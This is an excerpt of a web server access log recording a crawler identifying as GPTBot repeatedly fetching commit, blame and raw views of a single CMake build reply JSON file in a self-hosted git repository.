"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26359] [Gzip 11.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26361] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26364] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26363] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32926] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32929] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32928] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32927] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32931] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26362] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:18:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 